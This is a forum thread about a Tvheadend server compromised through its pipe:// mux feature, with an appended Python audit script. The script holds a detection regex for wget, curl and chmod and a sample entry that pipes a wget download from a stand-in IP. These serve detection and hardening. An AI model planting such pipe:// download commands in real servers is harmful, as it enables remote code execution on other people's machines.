TV Headend pipe vulnerable to hacking?

Added by Stephen Neal over 7 years ago

Hi all

I've been running TV Headend for remote viewing via port forwarding, and recently saw some very odd additional muxes added that I didn't add, which were using the pipe functionality - that looked like someone had logged in remotely and was trying to use pipe to wget a shell script from a French IP address, chmod it and then run it...

Anyone else seen anything like this?


Replies (3)

RE: TV Headend pipe vulnerable to hacking? - Added by Mark Clarkstone over 7 years ago

It's not uncommon to see things like this; the number of unsecured tvh instances running on the net is beyond silly. You were more than likely found on Shodan.

If you must have remote access, create a limited anon account, and I mean limited, use a network prefix and even then only allow access to HTTP for playing channels/epg view!

RE: TV Headend pipe vulnerable to hacking? - Added by Stephen Neal over 7 years ago

Mark Clarkstone wrote:

It's not uncommon to see things like this; the number of unsecured tvh instances running on the net is beyond silly. You were more than likely found on Shodan.

If you must have remote access, create a limited anon account, and I mean limited, use a network prefix and even then only allow access to HTTP for playing channels/epg view!

Network prefix?

Is there a way to limit access for admin to local LAN addresses (which can be accessed remotely via a VPN if required) - and only allow very limited port forwarded access purely for streaming and EPG in Kodi? (The VPN I am running isn't powerful enough to handle HD video in real time - otherwise I'd do it all over a VPN)

RE: TV Headend pipe vulnerable to hacking? - Added by Mark Clarkstone over 7 years ago

Stephen Neal wrote:

Mark Clarkstone wrote:

It's not uncommon to see things like this; the number of unsecured tvh instances running on the net is beyond silly. You were more than likely found on Shodan.

If you must have remote access, create a limited anon account, and I mean limited, use a network prefix and even then only allow access to HTTP for playing channels/epg view!

Network prefix?

Allowed networks in the "Access Entries -> Users".

Is there a way to limit access for admin to local LAN addresses (which can be accessed remotely via a VPN if required) - and only allow very limited port forwarded access purely for streaming and EPG in Kodi? (The VPN I am running isn't powerful enough to handle HD video in real time - otherwise I'd do it all over a VPN)

I think so, just add another anon account with a different network prefix that has very limited access.

Put the limited one at the top & the admin one at the bottom.
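
Editor's added example (not part of the original thread and not Tvheadend project code): a small audit script that looks for the kind of mux entry described in the first post, by reporting every `pipe://` value found in saved configuration files and flagging download or permission-changing commands inside it. It assumes the configuration is stored as JSON files under a directory you pass in; the `iptv_url` key and the sample entries are constructed for illustration, and the scan does not depend on any particular key name.

```python
import json
import re
import sys
from pathlib import Path

# Commands that have no business appearing in a stream source definition.
SUSPICIOUS = re.compile(r"\b(wget|curl|chmod)\b")

def iter_strings(node):
    """Yield every string value found anywhere in a decoded JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for value in node.values():
            yield from iter_strings(value)
    elif isinstance(node, list):
        for value in node:
            yield from iter_strings(value)

def audit_mux(text):
    """Return (value, suspicious_words) for each pipe:// string in one config."""
    findings = []
    for value in iter_strings(json.loads(text)):
        if value.lower().startswith("pipe://"):
            findings.append((value, sorted(set(SUSPICIOUS.findall(value)))))
    return findings

def audit_tree(config_dir):
    """Walk a directory and audit every file that parses as JSON."""
    report = {}
    for path in Path(config_dir).rglob("*"):
        if not path.is_file():
            continue
        try:
            hits = audit_mux(path.read_text(errors="replace"))
        except (ValueError, OSError):
            continue  # not JSON, or unreadable: skip it
        if hits:
            report[str(path)] = hits
    return report

# Constructed sample entries (key name "iptv_url" is an assumption).
SAMPLE_OK = '{"enabled": true, "iptv_url": "http://192.0.2.10/stream.ts"}'
SAMPLE_BAD = '{"enabled": true, "iptv_url": "pipe://wget http://203.0.113.5/x"}'

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, hits in audit_tree(target).items():
        for value, words in hits:
            print(f"{path}: {value!r} suspicious={words}")
```

Legitimate pipe muxes exist, so every `pipe://` entry is reported; a non-empty `suspicious` list marks the ones to look at first.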
